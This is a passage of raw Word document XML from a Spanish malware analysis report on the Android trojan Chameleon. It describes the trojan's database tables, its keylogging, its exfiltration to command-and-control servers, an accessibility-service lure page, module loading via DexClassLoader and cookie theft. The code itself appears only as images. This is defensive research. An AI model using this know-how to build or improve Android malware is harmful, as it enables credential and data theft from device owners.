      <w:r w:rsidR="007D2D92">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por parte de </w:t>
      </w:r>
      <w:r w:rsidR="007D2D92" w:rsidRPr="002A7752">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DatabaseManagerService</w:t>
      </w:r>
      <w:r w:rsidR="007D2D92">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se encuentra a continuación, aunque no se descarta que se produzcan cambios en las tablas durante la ejecución del malware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774689DF" w14:textId="1BFE69F4" w:rsidR="007D2D92" w:rsidRDefault="002A7752" w:rsidP="002A7752">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tabla </w:t>
      </w:r>
      <w:r w:rsidRPr="007C07F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7459B2C7" w14:textId="390A202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command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F0F6E" w14:textId="6A989A7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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF296A5" w14:textId="26493C5B"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type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42090A85" w14:textId="79A9DE2D"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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BD5F9A" w14:textId="330B034E"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servers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA4F3F4" w14:textId="554C991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url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC1C362" w14:textId="6CF13D3F"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last_connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF6D28D" w14:textId="0C1FE633"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private_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211E5443" w14:textId="3F2AD46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open_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F16014" w14:textId="158C90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error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B027DA" w14:textId="4C4AB86D"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keylogger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247CD6CC" w14:textId="36B0F6F7"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032A26E3" w14:textId="0ABFF097"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text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D77FDF3" w14:textId="7C0863D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type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2803107E" w14:textId="37986B4C"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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232AECF0" w14:textId="0441682F"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apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185CC421" w14:textId="5670BE29"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package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207187C1" w14:textId="5C5522B6"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push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A9CD4" w14:textId="2F62EC19"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config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360266AD" w14:textId="7DBC9B68"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injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50653BA4" w14:textId="72546BC4"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cookie_start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F06F50E" w14:textId="01271609" w:rsidR="002A7752" w:rsidRP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cookie_end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439703CF" w14:textId="7AD301E9" w:rsidR="002A7752" w:rsidRDefault="002A7752" w:rsidP="002A7752">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla </w:t>
      </w:r>
      <w:r w:rsidRPr="007C07F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA5D6FA" w14:textId="16CF4E08"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E8550" w14:textId="09912B34" w:rsidR="002A7752" w:rsidRPr="007C07F7" w:rsidRDefault="002A7752" w:rsidP="002A7752">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Columna </w:t>
      </w:r>
      <w:r w:rsidRPr="007C07F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7C4D88" w14:textId="204D462D" w:rsidR="002A7752" w:rsidRDefault="002A7752" w:rsidP="002A7752">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Columna </w:t>
      </w:r>
      <w:r w:rsidRPr="007C07F7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9637E" w14:textId="77777777" w:rsidR="007D2D92" w:rsidRDefault="007D2D92" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022E2D9E" w14:textId="267B2223" w:rsidR="00295845" w:rsidRDefault="00BC590A" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una vez recopilados los datos, estos han de ser extraídos del dispositivo y enviados a los servidores remotos de C&amp;C. Para ello se utilizan las siguientes clases que han sido desofuscadas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD2401" w14:textId="77777777" w:rsidR="00295845" w:rsidRDefault="00295845" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1777149C" w14:textId="3A84966E" w:rsidR="00B236A1" w:rsidRDefault="000C1FC5" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="216385B5">
          <v:shape id="Picture 21" o:spid="_x0000_i1027" type="#_x0000_t75" alt="A screenshot of a computer screen&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="width:442pt;height:450pt;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId54" o:title="A screenshot of a computer screen&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D6B944" w14:textId="787F7E0E" w:rsidR="00B236A1" w:rsidRDefault="00B236A1" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43025656" w14:textId="5AF97BFB" w:rsidR="00B066F4" w:rsidRDefault="00B066F4" w:rsidP="00B066F4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un recurso importante encontrado en estas clases, concretamente en ExfiltrationEscalationUtils, es el código HTML de una página web. Se encuentra originalmente codificado en Base64, y tras su descodificación y renderizado por un navegador web, se obtiene el siguiente resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7578FF55" w14:textId="77777777" w:rsidR="00B066F4" w:rsidRDefault="00B066F4" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141FF562" w14:textId="77777777" w:rsidR="00B066F4" w:rsidRDefault="00B066F4" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1844A2C2" w14:textId="77777777" w:rsidR="00B066F4" w:rsidRDefault="00B066F4" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2135F470" w14:textId="0D696543" w:rsidR="007C3EC6" w:rsidRDefault="000C1FC5" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="083EC4E9">
          <v:shape id="_x0000_s2061" type="#_x0000_t75" alt="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:5.85pt;width:439.35pt;height:176.95pt;z-index:29;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55" o:title="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D18E6" w14:textId="687D6161" w:rsidR="00B066F4" w:rsidRDefault="00B066F4" w:rsidP="00B066F4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La web almacenada en la clase parece formar parte del mecanismo de escalada de permisos para activar el servicio de accesibilidad para la aplicación. No obstante, parece estar inacabada o tener valores generados dinámicamente, siendo </w:t>
      </w:r>
      <w:r w:rsidRPr="00B066F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>%Enable_Accesibility_Service%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> un potencial marcador o comodín sustituido por el nombre que trata de suplantar el malware.</w:t>
      </w:r>
      <w:r w:rsidR="00AF42F9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se tratará de </w:t>
      </w:r>
      <w:r w:rsidR="001F7B83">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>averiguar</w:t>
      </w:r>
      <w:r w:rsidR="00AF42F9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> si el mecanismo observado durante la ejecución dinámica hace uso de este recurso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35343EDC" w14:textId="74C8ACD2" w:rsidR="00B066F4" w:rsidRDefault="00B74C84" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En resumen, c</w:t>
      </w:r>
      <w:r w:rsidR="00B066F4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>omo se puede observar tras el análisis de estas clases, se realizan distintos tipos de exfiltración en función de las condiciones que se presenten y los comandos que reciba el malware. Estos comandos, que serán comentados en más detalle posteriormente, también permiten la instalación de nuevas aplicaciones a partir de ficheros en formato JAR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4882E365" w14:textId="2915679A" w:rsidR="00552671" w:rsidRDefault="00552671" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta instalación de nuevas aplicaciones también está asistida por la clase </w:t>
      </w:r>
      <w:r w:rsidRPr="008C51AB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ModuleManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620995F" w14:textId="1967D872" w:rsidR="000C6411" w:rsidRDefault="000C1FC5" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="4A51A124">
          <v:shape id="_x0000_s2060" type="#_x0000_t75" alt="A black screen with white text&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:106.65pt;margin-top:35.25pt;width:196.05pt;height:159.45pt;z-index:2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56" o:title="A black screen with white text&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3BF84B" w14:textId="16BA383C" w:rsidR="0037077E" w:rsidRDefault="0037077E" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D82FCD" w14:textId="34711A2D" w:rsidR="00552671" w:rsidRDefault="000C6411" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Como se puede </w:t>
      </w:r>
      <w:r w:rsidR="00793C5F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>apreciar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, a través de esta clase se puede realizar la carga de módulos y clases Java, nuevamente utilizando </w:t>
      </w:r>
      <w:r w:rsidRPr="00C90C11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DexClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para llevar a cabo las acciones. Además, permite la creación de archivos y la exfiltración de información acerca de los módulos, almacenándola previamente en la base de datos SQLite local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046461B0" w14:textId="77777777" w:rsidR="00833A51" w:rsidRDefault="00833A51" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7128DBC0" w14:textId="30325F05" w:rsidR="00EC7EC7" w:rsidRDefault="00976606" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Además de tener la posibilidad de instalar sus propios paquetes, </w:t>
      </w:r>
      <w:r w:rsidR="00EC7EC7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Chameleon también realiza un análisis de las aplicaciones instaladas en el dispositivo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por parte del sistema Android o del propio usuario</w:t>
      </w:r>
      <w:r w:rsidR="00EC7EC7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, creando una serie de tareas en segundo plano que son las encargadas de recopilar la información acerca de las aplicaciones que será posteriormente exfiltrada y almacenarla en la base de datos. Las clases mostradas son las que gestionan el proceso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E670B17" w14:textId="268C21E3" w:rsidR="00EC7EC7" w:rsidRDefault="000C1FC5" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="57216FF6">
          <v:shape id="Picture 28" o:spid="_x0000_s2059" type="#_x0000_t75" alt="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:6.2pt;width:356.2pt;height:298.1pt;z-index:26;visibility:visible;mso-wrap-style:square;mso-wrap-edited:f;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId57" o:title="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10AD0B" w14:textId="77777777" w:rsidR="00E80FB6" w:rsidRDefault="00E80FB6" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0835EF" w14:textId="4CE34977" w:rsidR="00EC7EC7" w:rsidRDefault="00EC7EC7" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Un punto importante es que el malware elige no recopilar información acerca de aplicaciones desarrolladas con React. </w:t>
      </w:r>
      <w:r w:rsidR="00EA48D1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta comprobación podría tener relación con el código referencia a React encontrado previamente durante el análisis, </w:t>
      </w:r>
      <w:r w:rsidR="000A74A8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ya que de este modo se evitaría</w:t>
      </w:r>
      <w:r w:rsidR="00EA48D1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A74A8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>extraer</w:t>
      </w:r>
      <w:r w:rsidR="00EA48D1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> información </w:t>
      </w:r>
      <w:r w:rsidR="001E6071">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que hiciese referencia</w:t>
      </w:r>
      <w:r w:rsidR="00EA48D1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E6071">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00EA48D1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>l propio malware</w:t>
      </w:r>
      <w:r w:rsidR="00A62764">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. No obstante, no se tiene ningún indicio acerca de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la razón de este comportamiento</w:t>
      </w:r>
      <w:r w:rsidR="00714DB3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> ya que no existen más referencias </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>en el código que permitan expandir el contexto. El siguiente código desofuscado es la comprobación realizada que excluye a React:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43241D34" w14:textId="77777777" w:rsidR="00EC7EC7" w:rsidRDefault="00EC7EC7" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03124FA6" w14:textId="616CAB82" w:rsidR="00EC7EC7" w:rsidRDefault="000C1FC5" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="073A93DB">
          <v:shape id="Picture 29" o:spid="_x0000_s2058" type="#_x0000_t75" alt="" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:6.3pt;width:439.6pt;height:25.25pt;z-index:27;visibility:visible;mso-wrap-style:square;mso-wrap-edited:f;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId58" o:title=""/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69030797" w14:textId="77777777" w:rsidR="00EC7EC7" w:rsidRDefault="00EC7EC7" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4CA98D" w14:textId="7C6247DD" w:rsidR="0031037D" w:rsidRDefault="0031037D" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Parte de los datos que extrae Chameleon son relativos a las posibles cookies almacenadas en el </w:t>
      </w:r>
      <w:r w:rsidR="00973121">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">navegador web </w:t>
      </w:r>
      <w:r w:rsidR="008C2F67">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">del </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sistema</w:t>
      </w:r>
      <w:r w:rsidR="00973121">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la </w:t>
      </w:r>
      <w:r w:rsidR="00892AF7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">clase </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00892AF7" w:rsidRPr="00892AF7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CookieManagerExtender</w:t>
      </w:r>
      <w:r w:rsidR="00892AF7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la encargada de aplicar los ajustes necesarios. Esta clase extiende el gestor estándar de cookies proporcionado por Java, </w:t>
      </w:r>
      <w:r w:rsidR="00892AF7" w:rsidRPr="004765AB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CookieManager</w:t>
      </w:r>
      <w:r w:rsidR="00892AF7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
